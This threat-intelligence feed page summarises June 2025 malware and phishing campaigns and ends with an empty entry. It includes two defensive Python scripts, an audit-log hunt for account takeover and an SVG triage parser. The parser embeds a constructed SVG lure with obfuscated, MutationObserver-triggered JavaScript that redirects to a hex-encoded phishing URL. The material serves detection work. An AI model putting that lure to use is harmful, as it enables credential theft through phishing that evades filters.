2025-06-10
Impact:
MEDIUM
Summary:
CyberProof researchers have observed a significant surge in phishing campaigns that abuse legitimate Microsoft SharePoint links to evade detection and harvest credentials. Attackers leverage the inherent trust users and security tools place in SharePoint URLs to deliver multi-stage credential harvesting pages. These attacks are increasingly sophisticated, often requiring the specific victim's email address and a legitimate Microsoft-sent one-time code to proceed, foiling automated analysis. Following a successful compromise, threat actors have been observed adding their own multi-factor authentication (MFA) methods and creating malicious inbox rules to maintain persistence and further infiltrate the organization.
Source: https://www.cyberproof.com/blog/deceptive-links-unmasking-sharepoint-phishing-attacks/
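The post-compromise steps described above (a new MFA method and hiding inbox rules) leave audit records that can be correlated with the sign-in that preceded them. The hunting script below is an added example, not CyberProof's detection logic; it anchors on a sign-in from an IP the account has never used and flags those two follow-on actions within a short window. The record shapes loosely follow the Microsoft 365 Unified Audit Log and Entra sign-in/audit fields but are constructed here, as are the baseline IPs and the activity name used for MFA registration.

```python
"""Hunt for follow-on activity after a phished sign-in, over constructed audit records.

Added example, not CyberProof's detection logic. It anchors on a sign-in from
an IP the account has never used, then flags, within a short window, the two
actions the campaign is reported to take: registering a new MFA method and
creating an inbox rule that hides or forwards mail. Record shapes loosely
follow the Microsoft 365 Unified Audit Log (Operation, UserId, ClientIP,
CreationTime, Parameters) but are constructed here, as are the baseline IPs.
"""
from datetime import datetime, timedelta

HIDE_OR_FORWARD = {"DeleteMessage", "ForwardTo", "ForwardAsAttachmentTo", "RedirectTo", "MarkAsRead"}
HIDEAWAY_FOLDERS = {"rss subscriptions", "rss feeds", "archive", "conversation history", "junk email"}
SENSITIVE_WORDS = {"password", "invoice", "payment", "security", "helpdesk", "mfa"}
MFA_REGISTRATION = "User registered security info"  # Entra audit activity name (assumption)

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

def rule_is_suspicious(params):
    """Return a reason string if New-InboxRule parameters look like hiding/forwarding, else None."""
    kv = {p["Name"]: str(p["Value"]) for p in params}
    reasons = []
    hidden = set(kv) & HIDE_OR_FORWARD
    if hidden:
        reasons.append("hide/forward action " + ",".join(sorted(hidden)))
    if kv.get("MoveToFolder", "").lower() in HIDEAWAY_FOLDERS:
        reasons.append("moves mail to '%s'" % kv["MoveToFolder"])
    words = kv.get("SubjectContainsWords", "").lower()
    if any(w in words for w in SENSITIVE_WORDS):
        reasons.append("filters on sensitive subject words")
    return "; ".join(reasons) if reasons else None

def hunt(records, baseline_ips, window=timedelta(hours=2)):
    """Return (user, operation, client_ip, reason) for suspicious actions after a new-IP sign-in."""
    known = {u: set(ips) for u, ips in baseline_ips.items()}
    anchor = {}  # user -> (time, ip) of the latest sign-in from a never-seen IP
    findings = []
    for r in sorted(records, key=lambda r: parse_ts(r["CreationTime"])):
        user, op, ip = r["UserId"], r["Operation"], r.get("ClientIP", "")
        t = parse_ts(r["CreationTime"])
        if op == "UserLoggedIn":
            seen = known.setdefault(user, set())
            if ip not in seen:
                anchor[user] = (t, ip)
                seen.add(ip)
            continue
        if user not in anchor or t - anchor[user][0] > window:
            continue
        since = int((t - anchor[user][0]).total_seconds() // 60)
        if op == MFA_REGISTRATION:
            findings.append((user, op, ip, "new MFA method %d min after sign-in from new IP %s" % (since, anchor[user][1])))
        elif op == "New-InboxRule":
            why = rule_is_suspicious(r.get("Parameters", []))
            if why:
                findings.append((user, op, ip, "%s, %d min after sign-in from new IP %s" % (why, since, anchor[user][1])))
    return findings

BASELINE_IPS = {"alice@example.com": {"203.0.113.10"}, "bob@example.com": {"203.0.113.11"}}

# Constructed records: alice is phished and the attacker signs in from 198.51.100.77;
# bob creates an ordinary filing rule from his usual address.
SAMPLE_RECORDS = [
    {"CreationTime": "2025-06-10T08:00:00", "Operation": "UserLoggedIn", "UserId": "alice@example.com", "ClientIP": "203.0.113.10"},
    {"CreationTime": "2025-06-10T09:05:00", "Operation": "UserLoggedIn", "UserId": "alice@example.com", "ClientIP": "198.51.100.77"},
    {"CreationTime": "2025-06-10T09:12:00", "Operation": MFA_REGISTRATION, "UserId": "alice@example.com", "ClientIP": "198.51.100.77"},
    {"CreationTime": "2025-06-10T09:20:00", "Operation": "New-InboxRule", "UserId": "alice@example.com", "ClientIP": "198.51.100.77",
     "Parameters": [{"Name": "Name", "Value": "."}, {"Name": "SubjectContainsWords", "Value": "password;invoice;mfa"},
                    {"Name": "MoveToFolder", "Value": "RSS Subscriptions"}, {"Name": "MarkAsRead", "Value": "True"}]},
    {"CreationTime": "2025-06-10T09:30:00", "Operation": "UserLoggedIn", "UserId": "bob@example.com", "ClientIP": "203.0.113.11"},
    {"CreationTime": "2025-06-10T09:35:00", "Operation": "New-InboxRule", "UserId": "bob@example.com", "ClientIP": "203.0.113.11",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"}, {"Name": "FromAddressContainsWords", "Value": "news@"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_RECORDS, BASELINE_IPS):
        print(finding)
```

A rule named "." that marks mail read and files it under RSS Subscriptions is the classic pattern for hiding password-reset and invoice traffic from the real owner; on its own it is a medium-confidence signal, but within two hours of a first-seen IP and a new MFA registration it is close to a confirmed takeover.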
2025-06-10
SoraAI_Clickbait_InfoStealer
LOW
Intel Source:
K7 Labs
Intel Name:
SoraAI_Clickbait_InfoStealer
Date of Scan:
2025-06-10
Impact:
LOW
Summary:
According to analysis by K7 Labs, an information stealer is being distributed using social engineering tactics that leverage interest in generative AI tools. The campaign, first observed in late May 2025, begins when a user executes a malicious shortcut file (.lnk) masquerading as OpenAI's Sora. This initiates a multi-stage download process using PowerShell to fetch payloads from a public GitHub repository. The final payload is a comprehensive Python-based stealer that establishes persistence and proceeds to harvest a wide array of sensitive data, including browser credentials, cookies, credit card details, cryptocurrency wallets, gaming platform session data, and sensitive files from the victim's machine.
Source: https://labs.k7computing.com/index.php/a-soraai-clickbait/
2025-06-10
DanaBot_C2_Memory_Leak_DanaBleed
MEDIUM
Intel Source:
Zscaler
Intel Name:
DanaBot_C2_Memory_Leak_DanaBleed
Date of Scan:
2025-06-10
Impact:
MEDIUM
Summary:
Zscaler researchers have discovered a critical memory leak vulnerability, dubbed "DanaBleed," within the command-and-control (C2) infrastructure of the DanaBot Malware-as-a-Service (MaaS) platform. Introduced in a June 2022 software update, a programming error in the Delphi-based C2 server caused it to append uninitialized memory to network responses, leaking sensitive data until early 2025. This flaw, comparable to the 2014 Heartbleed bug, exposed the group's internal operations, including threat actor credentials, backend infrastructure IPs and onion domains, private cryptographic keys, and exfiltrated victim information.
Source: https://www.zscaler.com/blogs/security-research/danableed-danabot-c2-server-memory-leak-bug
2025-06-09
BladedFeline_Target_Kurdish_and_Iraqi_Officials
MEDIUM
Intel Source:
ESET
Intel Name:
BladedFeline_Target_Kurdish_and_Iraqi_Officials
Date of Scan:
2025-06-09
Impact:
MEDIUM
Summary:
ESET researchers have discovered an Iran-aligned APT group called BladedFeline which is believed to be a subgroup of OilRig APT. The group has been active since at least 2017 and targets high-ranking officials within the Kurdistan Regional Government (KRG), the Government of Iraq (GOI), and a telecom provider in Uzbekistan. This group leverages custom malware such as Shahmaran, Whisper, Slippery Snakelet, the PrimeCache IIS module and reverse tunneling tools like Laret and Pinar. These tools are designed to maintain long-term access to compromised systems, steal sensitive data and execute remote commands. It is believed that the group gains initial access by exploiting internet-facing applications and using stolen email accounts. The group’s primary objective is long-term intelligence gathering to monitor political developments in the region and reduce Western influence.
Source: https://www.welivesecurity.com/en/eset-research/bladedfeline-whispering-dark/
2025-06-09
Operation_DRAGONCLONE
MEDIUM
Intel Source:
Seqrite
Intel Name:
Operation_DRAGONCLONE
Date of Scan:
2025-06-09
Impact:
MEDIUM
Summary:
Researchers from Seqrite Labs have uncovered a sophisticated attack on China Mobile Tietong Co., Ltd., a subsidiary of China Mobile, using a multi-stage delivery chain involving VELETRIX and VShell. The attack began in May 2025 with a ZIP file posing as internal training material. The archive contained legitimately signed binaries alongside a hidden malicious file that used DLL sideloading to deploy VELETRIX. The loader uses sandbox evasion, IP obfuscation and in-memory execution to avoid detection; its main job is to load VShell, a framework used to control compromised machines. VShell communicates over standard Windows networking features and is known to be used by Chinese state-sponsored groups such as UNC5174 and Earth Lamia. Researchers also linked the campaign to other tooling such as Cobalt Strike and SuperShell, with command servers hosted in China, Hong Kong and the US.
Source: https://www.seqrite.com/blog/operation-dragonclone-chinese-telecom-veletrix-vshell-malware/
2025-06-09
Threat_Actor_Pivot_to_New_Evasion_Tools
LOW
Intel Source:
eSentire
Intel Name:
Threat_Actor_Pivot_to_New_Evasion_Tools
Date of Scan:
2025-06-09
Impact:
LOW
Summary:
Researchers from eSentire have observed threat actors demonstrating significant operational resilience following the recent law enforcement takedown of a prominent malware scanning service during "Operation Endgame." The dismantled platform was a key tool for cybercriminals, allowing them to test malware evasion capabilities against security products without the risk of their samples being shared with vendors. eSentire's analysis shows threat actors have quickly migrated to alternative "no distribute" scanning services to continue refining their malicious payloads. This behavior is part of a systematic process where actors use crypters to pack malware and then iteratively test it until detection rates are acceptably low, enabling more effective campaigns.
Source: https://www.esentire.com/blog/operation-endgame-disrupts-avcheck-forces-threat-actors-to-seek-alternatives
2025-06-09
FormBook_Delivers_through_Malicious_Excel_File
LOW
Intel Source:
Fortinet
Intel Name:
FormBook_Delivers_through_Malicious_Excel_File
Date of Scan:
2025-06-09
Impact:
LOW
Summary:
Researchers from FortiGuard Labs have identified an ongoing phishing campaign exploiting the Microsoft Office vulnerability CVE-2017-0199 to install the FormBook information stealer. The campaign targets Windows users still running outdated Office versions (2007-2016) with emails posing as sales orders that carry malicious Excel attachments. When opened, the embedded OLE object triggers CVE-2017-0199 to retrieve and execute a remote HTA script via mshta.exe. The script downloads a secondary payload to disk and runs it to deploy FormBook, which can harvest credentials, keystrokes and clipboard data. The attackers use anti-debugging and obfuscation to evade detection.
Source: https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload
2025-06-08
NS1419_Ransomware_Deploy_via_Fake_Cracking_Tool
MEDIUM
Intel Source:
ASEC
Intel Name:
NS1419_Ransomware_Deploy_via_Fake_Cracking_Tool
Date of Scan:
2025-06-08
Impact:
MEDIUM
Summary:
Researchers at ASEC have discovered a ransomware campaign that disguises its payload as a password-cracking tool. The malware is built with PyInstaller and masquerades as a brute-force utility, targeting users looking for unauthorized-access tools. On execution it simulates HTTP requests and password attempts while, in the background, it encrypts the user's files with AES-256 in CFB mode. It skips critical system directories such as Program Files and Windows, appends the .NS1419 extension to encrypted files and drops a ransom note demanding $350 in Bitcoin. Because the ransomware neither stores nor transmits the encryption key, the files cannot be recovered even if the ransom is paid.
Source: https://asec.ahnlab.com/ko/88335/
2025-06-08
Attackers_Use_SVG_Images_to_Steal_Credentials
LOW
Intel Source:
ThreatDown
Intel Name:
Attackers_Use_SVG_Images_to_Steal_Credentials
Date of Scan:
2025-06-08
Impact:
LOW
Summary:
ThreatDown researchers have uncovered a phishing campaign that uses SVG files carrying obfuscated JavaScript to steal Microsoft credentials. The attack begins with a spoofed internal email to an employee at a logistics company that contains an SVG attachment. The file includes obfuscated JavaScript that only runs when the document changes, using a MutationObserver to evade detection. The script decodes a hex-encoded payload and redirects the victim to a phishing site. Once the user enters their password, the attackers can use it to access the company's internal systems and sensitive files, or to deploy ransomware.
Source: https://www.threatdown.com/blog/criminals-smuggle-phishing-code-in-svg-images/
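Because mail gateways tend to treat SVG as an image, the script inside it is best caught statically, before rendering. The parser below is an added example, not ThreatDown's detection; it collects every `<script>` body and `on*` handler attribute, decodes long hex literals and reports MutationObserver use and any URL the decoded payload reveals. The sample SVG is constructed, and the hex literal in it encodes a URL on a reserved example domain.

```python
"""Static triage of an SVG attachment for embedded script.

Added example, not ThreatDown's detection. Email filters often pass SVG as an
image; this parser collects every <script> body and on* event attribute,
decodes long hex literals and reports MutationObserver use and any URL the
decoded payload reveals. The SVG below is constructed; its hex literal
encodes a phishing URL on a reserved example domain.
"""
import re
import xml.etree.ElementTree as ET

HEX_LITERAL = re.compile(r"['\"]((?:[0-9a-fA-F]{2}){8,})['\"]")  # quoted run of >= 8 hex bytes
URL = re.compile(r"https?://[^\s'\"<>]+")

def _local(tag):
    return tag.split("}", 1)[-1].lower()

def script_sources(svg_text):
    """Return every piece of executable JS: <script> bodies (CDATA included) and on* attributes."""
    root = ET.fromstring(svg_text)
    pieces = []
    for el in root.iter():
        if _local(el.tag) == "script" and el.text and el.text.strip():
            pieces.append(el.text)
        for attr, value in el.attrib.items():
            if _local(attr).startswith("on"):  # onload, onclick, onmouseover, ...
                pieces.append(value)
    return pieces

def decode_hex_literals(js):
    """Decode quoted hex strings into text; skip anything that is not valid UTF-8."""
    decoded = []
    for h in HEX_LITERAL.findall(js):
        try:
            decoded.append(bytes.fromhex(h).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded

def triage_svg(svg_text):
    """Summarise the script found in an SVG: presence, MutationObserver trick, decoded strings, URLs."""
    pieces = script_sources(svg_text)
    verdict = {"has_script": bool(pieces), "mutation_observer": False, "decoded": [], "urls": []}
    for js in pieces:
        if "MutationObserver" in js:
            verdict["mutation_observer"] = True
        for text in decode_hex_literals(js):
            verdict["decoded"].append(text)
            verdict["urls"].extend(URL.findall(text))
        verdict["urls"].extend(URL.findall(js))
    return verdict

# Constructed lure: a 1x1 image whose script only fires once the DOM mutates,
# then redirects to the hex-encoded phishing URL.
PHISH_HEX = "https://login.example/secure/auth".encode().hex()
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">\n'
    '  <rect width="1" height="1" fill="#fff"/>\n'
    '  <script type="text/javascript"><![CDATA[\n'
    '    var k = "' + PHISH_HEX + '";\n'
    "    var o = new MutationObserver(function () {\n"
    "      window.location = decodeURIComponent(k.replace(/../g, function (h) { return '%' + h; }));\n"
    "    });\n"
    "    o.observe(document.documentElement, { childList: true, subtree: true });\n"
    '    document.documentElement.appendChild(document.createElement("g"));\n'
    "  ]]></script>\n"
    "</svg>\n"
)

if __name__ == "__main__":
    print(triage_svg(SAMPLE_SVG))
```

The MutationObserver wrapper defeats sandboxes that load the SVG and capture the initial state only: nothing happens until the script itself appends a node, which is why the triage keys on the observer's presence rather than on a visible redirect. A mail filter that simply blocks any SVG containing `<script>` or an `on*` attribute is the blunter but more reliable control.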
2025-06-08
PathWiper_Targets_Ukrainian_Critical_Infrastructure
LOW
Intel Source:
Cisco Talos
Intel Name:
PathWiper_Targets_Ukrainian_Critical_Infrastructure
Date of Scan:
2025-06-08
Impact:
LOW
Summary:
Researchers from Cisco Talos have discovered a campaign against a critical infrastructure organization in Ukraine using a data-wiping malware dubbed PathWiper, distributed through a legitimate endpoint management tool. The attackers issued console commands from that tool to run a VBScript that delivered and launched PathWiper across multiple systems. Once running, the wiper enumerates all currently and previously connected storage devices, including network drives, and permanently destroys data by overwriting files and key NTFS structures with random data. PathWiper's tactics closely resemble those of HermeticWiper, a destructive tool previously attributed to Russia's Sandworm group. Talos attributes the operation to a Russia-aligned state-sponsored threat actor with high confidence.
Source: https://blog.talosintelligence.com/pathwiper-targets-ukraine/
2025-06-08
Hacktivist_Groups_Pivot_to_RaaS
MEDIUM
Intel Source:
Rapid7
Intel Name:
Hacktivist_Groups_Pivot_to_RaaS
Date of Scan:
2025-06-08
Impact:
MEDIUM
Summary:
Rapid7 researchers have observed a significant shift among hacktivist groups such as FunkSec, KillSec, and GhostSec, transitioning to financially motivated cybercrime, specifically Ransomware-as-a-Service (RaaS) operations. Initially driven by political or social ideologies and engaging in DDoS and defacement attacks, these groups have increasingly adopted double extortion tactics—data exfiltration and encryption—leveraging RaaS models for profit. FunkSec, emerging in December 2024 and aligning with "Free Palestine," now targets diverse sectors globally using AI-generated FunkLocker ransomware. KillSec, active since 2021 and Russia-aligned, shifted to ransomware in October 2023, offering KillSecurity ransomware for Windows and ESXi. GhostSec, known since 2015 for #OpIsis, partnered with Stormous ransomware in July 2023, launched GhostLocker RaaS in October 2023, and announced a return to hacktivism in May 2024, leaving GhostLocker with Stormous.
Source: https://www.rapid7.com/blog/post/2025/06/03/from-ideology-to-financial-gain-exploring-the-convergence-from-hacktivism-to-cybercrime/
2025-06-07
AMOS_Variant_Targets_Spectrum_Users_via_Clickfix
LOW
Intel Source:
cloudsek
Intel Name:
AMOS_Variant_Targets_Spectrum_Users_via_Clickfix
Date of Scan:
2025-06-07
Impact:
LOW
Summary:
Researchers at CloudSEK have identified an active campaign by Russian-speaking threat actors distributing a new Atomic macOS Stealer (AMOS) variant, first detailed around June 4, 2025. The operation leverages typo-squatted domains impersonating the U.S. telecom provider Spectrum and employs the Clickfix social engineering method, tricking users into executing malicious code. Attackers deliver operating system-specific payloads: macOS users are served a shell script to harvest system passwords and deploy the AMOS stealer by bypassing native security controls, while Windows users receive PowerShell commands.
Source: https://www.cloudsek.com/blog/amos-variant-distributed-via-clickfix-in-spectrum-themed-dynamic-delivery-campaign-by-russian-speaking-hackers
2025-06-07
Headerless_Malware_Uncovered
LOW
Intel Source:
Fortinet
Intel Name:
Headerless_Malware_Uncovered
Date of Scan:
2025-06-07
Impact:
LOW
Summary:
FortiGuard researchers have discovered a Remote Access Trojan (RAT) that infected a Windows system and remained active for several weeks without being detected. This malware runs directly in system memory without a valid PE header, which makes it hard for regular security tools to detect. It starts through scripts and PowerShell commands and runs under a process called dllhost.exe. It connects to its C2 server using a secure connection over port 443 and protects stolen data, such as system info and JPEG screenshots, by encrypting it with a custom XOR method. The malware can capture the victim’s screen, receive remote commands and manipulate system services, showing it is designed for deep system access and long-term spying.
Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-dumped-malware-without-a-pe-header
2025-06-07
ViperSoftX_Variant
LOW
Intel Source:
K7 Security Labs
Intel Name:
ViperSoftX_Variant
Date of Scan:
2025-06-07
Impact:
LOW
Summary:
Researchers from K7 Labs have uncovered the ViperSoftX malware targeting Windows systems through cracked software distributed via torrent platforms. The malware is primarily used to deliver information stealers and cryptocurrency hijackers. Upon execution, it leverages a hidden PowerShell loader to install and execute a second payload disguised as a legitimate DLL. This DLL contains a Lua script engine that runs hidden Lua scripts stored inside an encrypted ZIP file. Its primary objective is to steal personal information and cryptocurrency, especially by watching the clipboard for wallet addresses to hijack.
Source: https://labs.k7computing.com/index.php/in-depth-analysis-of-a-2025-vipersoftx-variant/
2025-06-06
DuplexSpy_RAT_Target_Window_Users
LOW
Intel Source:
Cyfirma
Intel Name:
DuplexSpy_RAT_Target_Window_Users
Date of Scan:
2025-06-06
Impact:
LOW
Summary:
CYFIRMA researchers have identified a new malware called DuplexSpy RAT that targets Windows systems. It was originally released publicly on GitHub by a user named ISSAC/iss4cfOng for educational purposes, but cybercriminals have now started using it. DuplexSpy allows attackers to fully control an infected machine, including logging keystrokes, recording screens, turning on webcams and microphones, running remote commands and even moving the mouse. It hides itself by copying files to startup folders, changing registry settings, injecting code into other programs and using encryption to avoid detection. It can also disguise itself as a legitimate Windows update and shut down security software to stay hidden.
Source: https://www.cyfirma.com/research/duplexspy-rat-stealthy-windows-malware-enabling-full-remote-control-and-surveillance/
2025-06-06
Malicious_NPM_Crypto_Wallet_Drainers
LOW
Intel Source:
Socket
Intel Name:
Malicious_NPM_Crypto_Wallet_Drainers
Date of Scan:
2025-06-06
Impact:
LOW
Summary:
Researchers at Socket have identified four malicious npm packages designed to drain Ethereum and BSC cryptocurrency wallets. These packages, created by an actor named @crypto-exploit (registered with a Russian webmail address) three to four years ago, collectively amassed over 2,100 downloads. The malware, embedded within packages like pancake_uniswap_validators_utils_snipe and env-process, uses obfuscated JavaScript that relies on environment variables for wallet private keys and then attempts to transfer 80-85% of the victim's wallet balance to a threat actor-controlled address. This known tactic aims for stealth and persistence by leaving some funds for gas fees.
Source: https://socket.dev/blog/malicious-npm-packages-target-bsc-and-ethereum
2025-06-06
Fake_Zoom_Client_Delivers_RAT
LOW
Intel Source:
ISC.SANS
Intel Name:
Fake_Zoom_Client_Delivers_RAT
Date of Scan:
2025-06-06
Impact:
LOW
Summary:
Researchers at ISC.SANS have found a campaign distributing malware through fake Zoom client updates, observed around June 4, 2025. Attackers lure victims with phishing emails containing fake Zoom meeting invitations. Clicking the embedded link directs users to a webpage prompting a Zoom client update, which, if downloaded, delivers an executable ("Session.ClientSetup.exe"). This initial payload acts as a downloader, deploying an MSI package that installs ScreenConnect, a legitimate remote access tool, configured for malicious control by the attackers and establishing persistence as a service. The primary objective appears to be gaining unauthorized remote access to victim systems. This tactic leverages the widespread reliance on collaborative tools, particularly since the shift to remote work, posing a significant risk of unauthorized access and potential follow-on attacks.
Source: https://isc.sans.edu/diary/rss/32014
2025-06-06
Malware_Disguised_as_AI_Tool_Installers
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Malware_Disguised_as_AI_Tool_Installers
Date of Scan:
2025-06-06
Impact:
MEDIUM
Summary:
Researchers from Cisco Talos have identified a significant trend where cybercriminals disguise malware as popular AI tools to trick users into downloading them. These fake AI installers are being used to spread three different threats: CyberLock ransomware, Lucky_Gh0$t ransomware and a newly discovered malware called Numero. The attackers are mainly targeting people and businesses in technology, marketing, and B2B sales. To lure victims, the attackers use tactics like search engine manipulation and fake messages on platforms like Telegram and social media. CyberLock is ransomware that encrypts files and demands $50,000 in Monero, falsely claiming the money supports humanitarian causes. Lucky_Gh0$t is a Yashma ransomware variant, hidden in a fake ChatGPT installer, that uses Microsoft AI tools to look legitimate and avoid detection. The third threat, Numero, is destructive malware disguised as an AI video creation tool that renders Windows systems unusable by replacing text and buttons with random numbers.
Source: https://blog.talosintelligence.com/fake-ai-tool-installers/
2025-06-05
Lazarus_Stealer_Targets_Professionals
LOW
Intel Source:
Any.Run
Intel Name:
Lazarus_Stealer_Targets_Professionals
Date of Scan:
2025-06-05
Impact:
LOW
Summary:
Researchers at ANY.RUN have found OtterCookie, a new JavaScript-based stealer malware attributed to the North Korean Lazarus Group, targeting finance and technology professionals. First observed in a campaign around June 2025, attackers employ social engineering, often through fake job offers or freelance bug fix tasks on platforms like LinkedIn, to deliver what appears to be legitimate Node.js code hosted in a Bitbucket repository. The malware's novelty lies in its execution method: an intentionally flawed piece of code triggers an error handler that fetches and executes a heavily obfuscated JavaScript payload from an external API, reportedly hosted in Finland.
Source: https://any.run/cybersecurity-blog/ottercookie-malware-analysis/
2025-06-05
AI_Tool_Misconfig_Exploited_for_Malicious_Payload
MEDIUM
Intel Source:
Sysdig
Intel Name:
AI_Tool_Misconfig_Exploited_for_Malicious_Payload
Date of Scan:
2025-06-05
Impact:
MEDIUM
Summary:
The Sysdig Threat Research Team has reported an incident where a threat actor exploited a misconfigured, internet-exposed Open WebUI instance to deploy an AI-generated Python payload. This payload targeted both Linux and Windows systems, downloading T-Rex and XMRig cryptominers for Monero and Kawpow, establishing persistence via systemd services, and using a Discord webhook for C2. The financially motivated attack leveraged uncommon defense evasion tools like processhider and argvhider (an LD_PRELOAD technique to hide process arguments) on Linux. The Windows variant was more sophisticated, deploying a Java-based loader (application-ref.jar) which in turn executed secondary malicious JARs containing infostealers targeting Chrome extensions and Discord tokens, and employed multiple DLLs for XOR decoding and sandbox evasion.
Source: https://sysdig.com/blog/attacker-exploits-misconfigured-ai-tool-to-run-ai-generated-payload/
2025-06-04
HuluCaptcha_CAPTCHA_Deploys_Malware
LOW
Intel Source:
Gi7w0rm (Medium)
Intel Name:
HuluCaptcha_CAPTCHA_Deploys_Malware
Date of Scan:
2025-06-04
Impact:
LOW
Summary:
Researchers from Gi7w0rm have uncovered a new malicious campaign called HuluCaptcha which uses fake CAPTCHA pages to distribute malware such as Lumma Stealer, Aurotun Stealer and Donut Injector. The attackers are compromising legitimate websites such as the German Association for International Law and the Los Angeles Caregiver Resource Center by injecting malicious JavaScript that redirects users to fake CAPTCHA screens designed to resemble Cloudflare. These deceptive pages trick users into executing malicious commands via the Windows Run dialog which installs malware. The campaign also includes tools for victim tracking, customized PowerShell payload generation and indications of an affiliate tracking system aimed at scaling the operation.
Source: https://gi7w0rm.medium.com/hulucaptcha-an-example-of-a-fakecaptcha-framework-9f50eeeb2e6d
2025-06-03
ViperSoftX_Targeting_Cryptocurrency_Users
LOW
Intel Source:
ASEC
Intel Name:
ViperSoftX_Targeting_Cryptocurrency_Users
Date of Scan:
2025-06-03
Impact:
LOW
Summary:
ASEC researchers have observed the ViperSoftX threat actor targeting cryptocurrency users across the globe, with recent attacks in Korea. This multi-stage malware campaign has been active for several years, aiming for financial gain by stealing cryptocurrency-related information and hijacking transactions. ViperSoftX gains initial access through pirated software or malicious torrent files. Once inside a system, it establishes persistence via scheduled tasks and obfuscated PowerShell scripts. The malware then deploys malicious tools including downloaders, information stealers like TesseractStealer, clipboard manipulators (ClipBanker) to change wallet addresses and RATs such as Quasar RAT and PureHVNC, communicating with C2 servers over HTTP and DNS. It can also monitor clipboard activity for cryptocurrency wallet addresses and BIP39 recovery phrases, exfiltrate browser data and system information, and execute arbitrary commands from the attacker.
Source: https://asec.ahnlab.com/ko/88265/
2025-06-03
JINX_0132_DevOps_Cryptojacking_Campaign
LOW
Intel Source:
Wiz.io
Intel Name:
JINX_0132_DevOps_Cryptojacking_Campaign
Date of Scan:
2025-06-03
Impact:
LOW
Summary:
Researchers at Wiz have identified a widespread cryptojacking campaign, attributed to the threat actor JINX-0132, targeting publicly accessible and misconfigured DevOps tools such as HashiCorp Nomad, Consul, Docker API, and Gitea, including instances in major cloud environments. Active as of June 2025, JINX-0132 exploits known vulnerabilities and insecure default settings—like Nomad's job creation or Consul's health checks—to achieve remote code execution and deploy the XMRig Monero miner for financial gain.
Source: https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign
2025-06-03
NightSpire_Ransomware
MEDIUM
Intel Source:
SOC Radar
Intel Name:
NightSpire_Ransomware
Date of Scan:
2025-06-03
Impact:
MEDIUM
Summary:
Researchers from Soc Radar have uncovered a new financially motivated ransomware group called NightSpire that emerged in early 2025. The group employs a double extortion technique in which they steal sensitive data from victims and threaten to publish it on their data leak site if the ransom is not paid. NightSpire primarily targets small to medium-sized organisations in the Technology, IT Services, Financial Services, Manufacturing, Construction, Education and Healthcare sectors across the U.S., Taiwan, Hong Kong, Egypt and several European nations. The group gains initial access by exploiting known vulnerabilities in VPNs, firewalls, or outdated web servers. Once inside, they use legitimate system tools such as PowerShell or PsExec to move laterally, steal credentials and escalate privileges. Before deploying ransomware, they exfiltrate data to attacker-controlled servers using tools like Rclone or MEGA. NightSpire leverages secure channels like ProtonMail or Telegram to communicate with victims.
Source: https://socradar.io/dark-web-profile-nightspire-ransomware/
2025-06-03
APT_28_Targeting_Western_Logistics_and_Technology_Entities
MEDIUM
Intel Source:
CISA
Intel Name:
APT_28_Targeting_Western_Logistics_and_Technology_Entities
Date of Scan:
2025-06-03
Impact:
MEDIUM
Summary:
A joint advisory issued by CISA, NSA, FBI and international partners warns that the GRU’s Unit 26165, also known as APT28 or Fancy Bear, has been conducting a long-running cyber espionage campaign targeting Western logistics and technology companies involved in the coordination, transport, and delivery of foreign assistance to Ukraine. The threat actor employs multiple tactics and techniques to gain initial access, including password spraying, spearphishing, exploiting vulnerabilities (in Outlook, Roundcube, and WinRAR) and abusing SOHO devices and VPNs. More recently, they have expanded their activity to include targeting internet-connected cameras in Ukraine and bordering NATO countries to monitor aid shipments. Once inside a system, the threat actor conducts reconnaissance and often uses tools like Impacket, PsExec, Certipy, and ADExplorer for lateral movement and data exfiltration, focusing on sensitive information related to aid shipments.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a
2025-06-02
Lazarus_Targeting_Crypto_via_Phishing
MEDIUM
Intel Source:
BitMEX
Intel Name:
Lazarus_Targeting_Crypto_via_Phishing
Date of Scan:
2025-06-02
Impact:
MEDIUM
Summary:
BitMEX researchers have analyzed how the Lazarus Group, linked to the North Korean government, continues its financially motivated campaigns against the cryptocurrency sector. Threat actors employ initial phishing and social engineering, such as recent LinkedIn pretexts for fake web3 project collaborations, to trick victims into executing malicious code often hosted in private GitHub repositories. This initial payload, as detailed by BitMEX, exfiltrates victim metadata to a misconfigured Supabase instance and deploys a second-stage JavaScript credential stealer, resembling "BeaverTail," aimed at pilfering browser data and cryptocurrency wallet access.
Source: https://blog.bitmex.com/bitmex-busts-lazarus-group/
2025-06-02
APT_C_53_Military_Themed_LNK_Attacks
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
APT_C_53_Military_Themed_LNK_Attacks
Date of Scan:
2025-06-02
Impact:
MEDIUM
Summary:
The 360 Advanced Threat Research Institute has recently captured VBScript samples attributed to APT-C-53 (Gamaredon), an advanced persistent threat group active since 2013 known for targeting government and military entities for intelligence theft. This campaign employs highly obfuscated VBS scripts and malicious LNK shortcut files, using military intelligence themes as bait to entice users into executing payloads via social engineering. The attackers utilize a phased deployment mechanism, achieving persistence through infected user files, registry modifications, and scheduled tasks, ultimately aiming to exfiltrate sensitive information. Forged HTTP request headers, including User-Agent and Referer fields referencing Ukrainian government domains, are used for command-and-control communication, which involves Base64 encoded data.
Source: https://mp.weixin.qq.com/s/sVc2dLNJwbpgEzBXkFyBRw
2025-06-02
Lyrix_Ransomware_Targeting_Windows
MEDIUM
Intel Source:
CYFIRMA
Intel Name:
Lyrix_Ransomware_Targeting_Windows
Date of Scan:
2025-06-02
Impact:
MEDIUM
Summary:
